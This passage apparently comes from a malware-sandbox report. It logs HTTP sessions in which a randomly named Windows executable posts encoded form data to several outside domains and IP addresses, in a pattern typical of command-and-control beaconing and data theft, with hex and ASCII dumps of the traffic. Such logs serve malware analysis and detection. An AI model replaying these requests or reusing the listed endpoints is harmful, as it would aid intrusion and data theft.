Data Raw: 64 70 79 34 76 44 4b 50 3d 59 68 50 33 4c 31 38 4e 2b 70 68 65 71 56 34 71 45 49 68 77 6f 35 46 4f 2f 52 35 33 6b 77 64 50 52 46 32 30 52 61 34 37 66 76 53 77 32 61 77 48 6e 4e 66 74 4c 6a 61 35 72 71 51 31 52 67 53 6b 6a 58 57 37 6a 52 32 6c 58 73 4c 61 50 65 52 37 6b 35 55 47 44 75 44 6e 73 46 34 34 50 2f 76 74 4f 46 45 76 6d 65 56 79 63 74 7a 78 64 67 41 2b 6a 58 31 33 78 34 43 76 73 62 58 52 47 4c 78 75 74 52 6f 75 70 49 58 42 72 37 55 51 4c 32 56 37 46 33 49 77 6c 4d 65 72 55 4f 65 47 55 36 38 6d 74 41 73 79 64 4e 78 75 58 49 49 4b 34 6d 77 54 39 46 54 4b 54 4e 78 36 33 64 51 4a 54 50 63 34 37 48 33 47 6d 71 73 3d
Data Ascii: dpy4vDKP=YhP3L18N+pheqV4qEIhwo5FO/R53kwdPRF20Ra47fvSw2awHnNftLja5rqQ1RgSkjXW7jR2lXsLaPeR7k5UGDuDnsF44P/vtOFEvmeVyctzxdgA+jX13x4CvsbXRGLxutRoupIXBr7UQL2V7F3IwlMerUOeGU68mtAsydNxuXIIK4mwT9FTKTNx63dQJTPc47H3Gmqs=


Session ID: 6
Source IP: 192.168.2.8
Source Port: 49715
Destination IP: 13.248.169.48
Destination Port: 80
PID: 5952
Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe

Timestamp: Dec 5, 2024 09:44:01.950649977 CET
Bytes transferred: 797
Direction: OUT
Data:
POST /p9ni/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.remedies.pro
Origin: http://www.remedies.pro
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 229
Cache-Control: max-age=0
Referer: http://www.remedies.pro/p9ni/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Data Raw: 64 70 79 34 76 44 4b 50 3d 59 68 50 33 4c 31 38 4e 2b 70 68 65 72 78 45 71 47 70 68 77 71 5a 46 4e 78 78 35 33 32 77 64 44 52 46 79 30 52 66 64 6d 66 64 6d 77 31 2f 4d 48 6d 4d 66 74 4f 6a 61 35 6a 4b 51 30 56 67 53 2f 6a 57 72 4d 6a 55 4f 6c 58 73 66 61 50 66 68 37 6b 76 63 48 43 2b 44 6c 30 31 34 36 41 66 76 74 4f 46 45 76 6d 65 52 55 63 74 62 78 63 51 77 2b 78 6a 42 6f 79 34 44 64 39 62 58 52 43 4c 77 6e 74 52 6f 32 70 4b 7a 6e 72 2b 51 51 4c 33 6c 37 4c 46 77 7a 76 4d 65 70 4a 2b 66 4f 54 5a 4d 72 69 42 51 57 51 4c 39 63 66 2b 38 56 30 77 42 35 6e 6e 62 4d 51 4e 5a 52 33 65 34 2f 57 34 42 51 68 6b 6e 32 34 39 34 72 6f 57 4d 4f 30 49 43 62 30 73 6c 61 54 6a 44 70 43 78 66 44
Data Ascii: dpy4vDKP=YhP3L18N+pherxEqGphwqZFNxx532wdDRFy0Rfdmfdmw1/MHmMftOja5jKQ0VgS/jWrMjUOlXsfaPfh7kvcHC+Dl0146AfvtOFEvmeRUctbxcQw+xjBoy4Dd9bXRCLwntRo2pKznr+QQL3l7LFwzvMepJ+fOTZMriBQWQL9cf+8V0wB5nnbMQNZR3e4/W4BQhkn2494roWMO0ICb0slaTjDpCxfD


Session ID: 7
Source IP: 192.168.2.8
Source Port: 49716
Destination IP: 13.248.169.48
Destination Port: 80
PID: 5952
Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe

Timestamp: Dec 5, 2024 09:44:04.614829063 CET
Bytes transferred: 1814
Direction: OUT
Data:
POST /p9ni/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.remedies.pro
Origin: http://www.remedies.pro
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Referer: http://www.remedies.pro/p9ni/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Data Raw: 64 70 79 34 76 44 4b 50 3d 59 68 50 33 4c 31 38 4e 2b 70 68 65 72 78 45 71 47 70 68 77 71 5a 46 4e 78 78 35 33 32 77 64 44 52 46 79 30 52 66 64 6d 66 64 65 77 32 4e 30 48 6e 72 4c 74 4a 6a 61 35 74 71 51 78 56 67 54 2f 6a 58 44 49 6a 55 4c 59 58 76 6e 61 4e 39 70 37 31 71 38 48 4c 2b 44 6c 6f 46 34 2f 50 2f 75 6e 4f 46 56 6d 6d 65 42 55 63 74 62 78 63 57 30 2b 68 6e 31 6f 30 34 43 76 73 62 58 46 47 4c 77 50 74 53 59 49 70 4b 6e 52 72 4e 59 51 4c 58 31 37 48 57 49 7a 31 4d 65 76 5a 75 66 2f 54 5a 42 72 69 43 6b 38 51 4c 67 42 66 35 51 56 78 31 34 7a 69 57 32 62 53 4c 31 6a 35 73 42 63 52 49 74 54 6e 55 37 4d 36 76 51 45 69 32 42 36 33 35 4c 62 2f 50 6b 53 4b 31 7a 39 50 45 6a 4e 51 45 30 76 43 41 6b 63 4a 6c 34 45 36 63 6a 31 6d 67 4b 5a 69 62 41 48 43 38 33 39 4b 7a 35 6a 46 6a 4d 52 71 77 34 43 68 4a 63 70 6d 43 2b 36 52 6a 36 61 70 31 69 43 4c 4f 61 70 61 30 2b 53 4a 2f 4e 51 4a 35 41 7a 46 34 36 69 6b 34 52 65 78 78 37 6c 6c 6a 57 37 44 6d 45 39 45 30 58 53 36 4b 32 5a 55 4c 4d 4c 2f 73 32 30 45 [TRUNCATED]
Data Ascii: dpy4vDKP=YhP3L18N+pherxEqGphwqZFNxx532wdDRFy0Rfdmfdew2N0HnrLtJja5tqQxVgT/jXDIjULYXvnaN9p71q8HL+DloF4/P/unOFVmmeBUctbxcW0+hn1o04CvsbXFGLwPtSYIpKnRrNYQLX17HWIz1MevZuf/TZBriCk8QLgBf5QVx14ziW2bSL1j5sBcRItTnU7M6vQEi2B635Lb/PkSK1z9PEjNQE0vCAkcJl4E6cj1mgKZibAHC839Kz5jFjMRqw4ChJcpmC+6Rj6ap1iCLOapa0+SJ/NQJ5AzF46ik4Rexx7lljW7DmE9E0XS6K2ZULML/s20E5AehM5zxvCEUbXO+UNWqRTZybfR9/o20gOdbUJTPIbXeDd7S6N+ypIets9Ag8WiIOncviyaLOQ20WthWST0RcX1AuEu7POK3sb1p9MuI82gcj7VSzspKTfhjJsHmI04TrTjllhj0SVb7Kf/VsVahahzammPnWau3/0nR/onmPwV77vYVp8ykQYcQ9Shgy5vAuQJMITbsN0Pz294oPnjF47a+cyaKLa52OkFrPuXYD5Rk9xupVmzKxZf2leoYccpGJN4znL1InFj85MIkwJ70Y48WjpYoyGVX9EK5coWJeQZYqL5GpZ8G7fjEC39yz5QiOetSDef095rOXMer6NRRghZ5Y1vXN01aaId2OULA2RfGOpVhzgP55euKeDDJ0n/efYUgLgVruaaxl4LfGZJM4s41e4b/WaXAhaK7oJmK9+6PaMcid5kvY43gvD/WisE4BT+CcrOHq+L6/02AGMU7sNS4+z0AtZqqGPTdP7ReAy136Nl8/xSN0s7q2rqQiuwbsjv8rbWJfu3dFuu4HUp4OXBfF22no6tbuLIxyLDd2PDp+E/blZam8KFBtiU0ZEerJIw3Td9DD2BpMZ9h78a/GQ0389+TcS0dYSw7qhPr6z2O2C8Ayk13Vdur4HE3z0joY4ozc62P7rm+3IVMyv6OWrEGcYAloTqhuu [TRUNCATED]


Session ID: 8
Source IP: 192.168.2.8
Source Port: 49717
Destination IP: 13.248.169.48
Destination Port: 80
PID: 5952
Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe

Timestamp: Dec 5, 2024 09:44:07.274946928 CET
Bytes transferred: 517
Direction: OUT
Data:
GET /p9ni/?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.remedies.pro
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)

Timestamp: Dec 5, 2024 09:44:08.367788076 CET
Bytes transferred: 409
Direction: IN
Data:
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 05 Dec 2024 08:44:08 GMT
Content-Type: text/html
Content-Length: 269
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 38 3d 65 72 65 70 61 30 61 48 67 26 64 70 79 34 76 44 4b 50 3d 56 6a 6e 58 49 43 5a 75 33 62 39 30 6b 7a 46 6d 46 34 4a 32 75 59 67 6f 2b 41 42 6c 39 78 78 68 4c 43 4f 4a 54 4f 6c 70 53 4e 6a 77 2f 76 64 4f 76 63 37 77 4c 53 76 78 6e 34 52 52 62 53 2b 46 72 56 36 38 69 54 4f 6a 64 50 48 72 56 39 30 59 39 49 42 4f 46 70 72 76 6a 56 59 65 50 38 69 43 66 43 68 4d 6d 2b 4e 50 58 65 36 54 58 69 78 6b 72 7a 4a 63 38 63 32 4b 67 5a 6d 45 44 5a 35 67 33 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g=="}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.849718195.110.124.133805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:14.284224987 CET804OUTPOST /io9k/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.officinadelpasso.shop
                                                                    Origin: http://www.officinadelpasso.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.officinadelpasso.shop/io9k/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 45 51 33 4b 4e 35 4a 32 69 34 53 6d 47 52 50 6c 47 62 5a 54 4f 73 62 6d 30 71 59 49 63 6c 51 78 46 71 53 4a 64 6b 4d 34 67 68 35 75 7a 6f 50 58 4e 54 71 69 71 62 42 62 62 6f 76 77 48 2f 6f 6e 50 34 50 72 4d 69 34 2f 41 69 30 72 72 57 45 66 50 6b 65 78 30 73 2f 4f 41 42 53 67 63 62 62 53 4b 52 45 74 30 63 56 62 4c 6a 4c 65 47 59 51 68 34 69 37 4a 4a 73 34 68 65 2b 73 30 68 73 34 33 45 67 7a 4c 4b 55 67 74 6d 78 6b 4a 37 2f 7a 56 78 50 4d 72 71 76 79 54 48 4e 38 79 46 55 73 71 4f 31 64 79 6d 49 68 78 51 4e 58 6e 2f 4b 33 73 43 78 78 56 4d 4d 76 57 41 55 75 56 42 48 49 51 32 55 6e 67 34 74 4d 3d
                                                                    Data Ascii: dpy4vDKP=EQ3KN5J2i4SmGRPlGbZTOsbm0qYIclQxFqSJdkM4gh5uzoPXNTqiqbBbbovwH/onP4PrMi4/Ai0rrWEfPkex0s/OABSgcbbSKREt0cVbLjLeGYQh4i7JJs4he+s0hs43EgzLKUgtmxkJ7/zVxPMrqvyTHN8yFUsqO1dymIhxQNXn/K3sCxxVMMvWAUuVBHIQ2Ung4tM=
                                                                    Timestamp: Dec 5, 2024 09:44:15.567703962 CET | Bytes transferred: 367 | Direction: IN
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:15 GMT
                                                                    Server: Apache
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>


                                                                    Session ID: 10 | Source IP: 192.168.2.8 | Source Port: 49719 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:44:16.955539942 CET | Bytes transferred: 824 | Direction: OUT
                                                                    POST /io9k/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.officinadelpasso.shop
                                                                    Origin: http://www.officinadelpasso.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.officinadelpasso.shop/io9k/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 45 51 33 4b 4e 35 4a 32 69 34 53 6d 48 79 48 6c 42 36 5a 54 4c 4d 62 6c 6f 36 59 49 4b 56 51 31 46 71 4f 4a 64 6c 34 57 67 53 64 75 77 4a 2f 58 4d 58 65 69 74 62 42 62 44 59 76 70 4a 66 6f 67 50 34 53 57 4d 67 38 2f 41 69 77 72 72 54 34 66 49 56 65 79 30 38 2f 4d 4d 68 53 69 59 62 62 53 4b 52 45 74 30 63 42 78 4c 6e 6e 65 47 73 55 68 36 44 37 4f 58 38 35 54 49 4f 73 30 32 38 34 7a 45 67 7a 70 4b 56 39 4b 6d 7a 63 4a 37 39 37 56 2f 2b 4d 30 6b 76 79 4a 4b 74 39 6a 55 68 5a 6e 49 47 4a 63 39 6f 74 70 4f 37 50 66 2b 38 47 47 59 54 35 54 50 4d 48 39 41 58 47 6a 45 77 56 34 73 33 33 51 6d 36 61 6c 58 5a 43 44 7a 6c 38 4c 55 4c 5a 46 6b 58 6b 76 69 51 50 70
                                                                    Data Ascii: dpy4vDKP=EQ3KN5J2i4SmHyHlB6ZTLMblo6YIKVQ1FqOJdl4WgSduwJ/XMXeitbBbDYvpJfogP4SWMg8/AiwrrT4fIVey08/MMhSiYbbSKREt0cBxLnneGsUh6D7OX85TIOs0284zEgzpKV9KmzcJ797V/+M0kvyJKt9jUhZnIGJc9otpO7Pf+8GGYT5TPMH9AXGjEwV4s33Qm6alXZCDzl8LULZFkXkviQPp
                                                                    Timestamp: Dec 5, 2024 09:44:18.244738102 CET | Bytes transferred: 367 | Direction: IN
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:18 GMT
                                                                    Server: Apache
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>


                                                                    Session ID: 11 | Source IP: 192.168.2.8 | Source Port: 49720 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:44:19.623923063 CET | Bytes transferred: 1841 | Direction: OUT
                                                                    POST /io9k/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.officinadelpasso.shop
                                                                    Origin: http://www.officinadelpasso.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.officinadelpasso.shop/io9k/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 45 51 33 4b 4e 35 4a 32 69 34 53 6d 48 79 48 6c 42 36 5a 54 4c 4d 62 6c 6f 36 59 49 4b 56 51 31 46 71 4f 4a 64 6c 34 57 67 53 56 75 7a 37 33 58 4e 77 43 69 73 62 42 62 64 6f 76 30 4a 66 6f 78 50 34 62 64 4d 67 68 4b 41 67 34 72 6b 52 41 66 4a 67 2b 79 37 38 2f 4d 45 42 53 2f 63 62 62 48 4b 52 55 70 30 63 52 78 4c 6e 6e 65 47 71 34 68 7a 79 37 4f 56 38 34 68 65 2b 73 34 68 73 34 4c 45 67 72 54 4b 56 49 39 6d 43 38 4a 36 65 54 56 7a 73 55 30 6f 76 79 50 4c 74 39 37 55 68 63 6e 49 47 46 71 39 72 78 54 4f 38 72 66 38 34 65 65 48 53 55 4c 65 66 44 42 47 51 58 47 64 48 5a 4a 6c 6b 54 46 70 35 69 37 5a 2f 6e 6f 6c 6c 30 32 55 71 34 62 78 67 59 50 72 6d 61 4a 68 6d 6a 41 6a 4f 31 2f 57 66 67 39 6a 6f 58 77 73 4f 5a 6b 6c 6e 38 77 56 6a 77 62 64 31 59 58 72 42 35 33 79 37 70 35 36 6a 57 53 66 2b 49 33 61 70 65 66 50 79 70 43 6a 4b 32 32 69 45 64 70 6f 57 5a 45 42 31 64 51 52 36 31 72 48 54 32 69 4f 52 4a 41 35 64 77 37 58 55 56 7a 65 6d 47 69 71 2f 64 52 73 62 79 2b 34 69 55 37 6a [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP= [TRUNCATED]
                                                                    Timestamp: Dec 5, 2024 09:44:21.019366980 CET | Bytes transferred: 367 | Direction: IN
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:20 GMT
                                                                    Server: Apache
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>


                                                                    Session ID: 12 | Source IP: 192.168.2.8 | Source Port: 49721 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:44:22.282315969 CET | Bytes transferred: 526 | Direction: OUT
                                                                    GET /io9k/?dpy4vDKP=JSfqOM1hntmKPRX8QapMCMaojpQJWGU7F5uIf0M4pwAd1rq+GgCVpaF7coK3O/ojAayWDC1AXCc++TdMJ3it9pzzLzylaJ3SA3sw8PdpX1afK4k48hvBTosEFJxP8txHbg==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.officinadelpasso.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Timestamp: Dec 5, 2024 09:44:23.579639912 CET | Bytes transferred: 367 | Direction: IN
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:23 GMT
                                                                    Server: Apache
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>


                                                                    Session ID: 13 | Source IP: 192.168.2.8 | Source Port: 49722 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:44:29.149302959 CET | Bytes transferred: 780 | Direction: OUT
                                                                    POST /2bf0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.liveplah.live
                                                                    Origin: http://www.liveplah.live
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.liveplah.live/2bf0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 4d 43 43 64 36 6d 52 4e 54 58 62 73 4b 78 55 76 42 5a 52 79 48 30 56 70 57 43 6d 50 6f 32 71 38 76 72 4d 62 34 54 58 48 72 59 33 49 76 6c 44 74 4a 53 74 53 77 53 69 32 53 43 6e 36 49 36 48 36 4e 77 6c 58 65 6d 4e 5a 49 49 76 5a 63 68 79 37 30 4a 39 65 43 53 61 53 4d 7a 50 62 37 4b 69 61 45 77 4a 71 38 4c 67 76 42 73 47 6e 36 62 76 55 57 2f 51 62 74 53 42 32 48 7a 35 4f 59 46 34 44 46 52 6e 2f 57 58 53 68 46 2f 45 59 47 32 4b 6b 62 7a 6e 71 75 32 56 56 33 73 4c 37 48 6b 2b 78 4e 70 68 61 76 31 2b 53 36 73 32 38 49 2f 67 54 6c 54 55 59 77 57 64 67 42 68 72 66 5a 35 63 43 36 46 6a 54 55 63 3d
                                                                    Data Ascii: dpy4vDKP=6MCCd6mRNTXbsKxUvBZRyH0VpWCmPo2q8vrMb4TXHrY3IvlDtJStSwSi2SCn6I6H6NwlXemNZIIvZchy70J9eCSaSMzPb7KiaEwJq8LgvBsGn6bvUW/QbtSB2Hz5OYF4DFRn/WXShF/EYG2Kkbznqu2VV3sL7Hk+xNphav1+S6s28I/gTlTUYwWdgBhrfZ5cC6FjTUc=
                                                                    Timestamp: Dec 5, 2024 09:44:30.374099970 CET | Bytes transferred: 533 | Direction: IN
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:30 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
